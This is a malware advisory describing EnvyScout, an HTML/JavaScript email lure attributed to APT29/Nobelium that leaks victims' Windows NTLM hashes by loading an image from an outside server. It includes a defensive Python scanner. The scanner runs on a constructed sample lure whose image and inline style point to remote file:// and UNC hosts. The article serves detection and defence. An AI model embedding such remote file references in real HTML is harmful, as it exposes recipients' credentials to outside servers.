Remove EnvyScout Malware

The APT29 hackers, also tracked under the group name Nobelium, have recently unleashed a new attack campaign that uses a whole new array of malware samples. The previously undetected malware families were likely developed by the Nobelium criminals themselves, and they are being used in carefully planned attacks that involve multiple stages of execution.

So far, the recent campaign has targeted several organizations around the world, the most notable of which is the U.S. Agency for International Development (USAID). Allegedly, the hackers managed to compromise one of the organization's email accounts and then abused it to send out spam emails delivering the various payloads. The targeted organizations span a wide range of sectors, including development, humanitarian, political, and various other non-profit organizations.

One of the first payloads involved in these attacks is called EnvyScout. It is a very simple malicious file that uses a combination of HTML and JavaScript to try to load a special image from an external server. The way the loading is done, however, enables the attackers to obtain the user's Windows NTLM (NT LAN Manager) credentials in an encoded (hashed) form. They can then try to recover the plain-text password and use it to compromise the victim's machine in order to deploy additional payloads.
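As an added defensive example (not EnvyScout's code and not taken from this page), the following Python script scans an HTML attachment for image or other resource references that use `file://` URLs or UNC paths naming a remote host, which is how an HTML lure can make Windows offer NTLM authentication to an outside server. It assumes the lure references its image in that way and runs on a constructed sample document.

```python
"""Flag HTML that fetches resources via file:// URLs or UNC paths on a remote host. Added example."""
import re
from html.parser import HTMLParser

FETCH_ATTRS = {"src", "href", "data", "poster", "background"}  # fetched automatically by the viewer
LOCAL_HOSTS = {"", "localhost", "127.0.0.1"}                 # file:// hosts that stay on the machine
UNC_RE = re.compile(r"^\\\\([^\\/]+)")                        # \\host\share\...
STYLE_URL_RE = re.compile(r"url\(\s*['\"]?([^'\")\s]+)")      # url(...) inside inline CSS

def remote_file_host(url):
    """Return the remote host a file:// URL or UNC path names, or None if it is not remote."""
    u = url.strip()
    if m := UNC_RE.match(u):
        return m.group(1)
    if not u.lower().startswith("file:"):
        return None
    rest = u[5:].lstrip("/")                    # 'file://host/share/x' -> 'host/share/x'
    host = re.split(r"[/\\]", rest, maxsplit=1)[0]
    if host.lower() in LOCAL_HOSTS or re.fullmatch(r"[A-Za-z]:", host):  # drive letter = local
        return None
    return host

class LureScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []                      # (tag, attribute, remote_host) triples
    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in FETCH_ATTRS and value:
                candidates = [value]
            elif name == "style" and value:
                candidates = STYLE_URL_RE.findall(value)   # url() references in inline styles
            else:
                continue
            for cand in candidates:
                host = remote_file_host(cand)
                if host:
                    self.findings.append((tag, name, host))

def scan_html(html_text):
    """Return every remote file:// or UNC resource reference found in an HTML document."""
    scanner = LureScanner()
    scanner.feed(html_text)
    return scanner.findings

# Constructed sample lure (not a real EnvyScout file): a remote file:// image, a harmless https image,
# and a UNC path hidden in an inline style. Hosts are documentation/example values.
SAMPLE_LURE = """<html><body><p>Open the attached document to view it.</p>
<img src="file://203.0.113.10/share/logo.png" alt=""><img src="https://example.org/real.png">
<div style="background-image:url(\\\\files.example.net\\pub\\bg.jpg)"></div></body></html>"""
```

Any non-empty result for an inbound HTML attachment is worth quarantining and checking against outbound SMB/WebDAV connection logs for the named host.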

The EnvyScout malware is the very first stage of the chain of attacks that the Nobelium hackers perform in their recent operation. Users should be wary of suspicious emails asking them to download and view an attachment, and should always scan such files with a suitable security tool.

June 1, 2021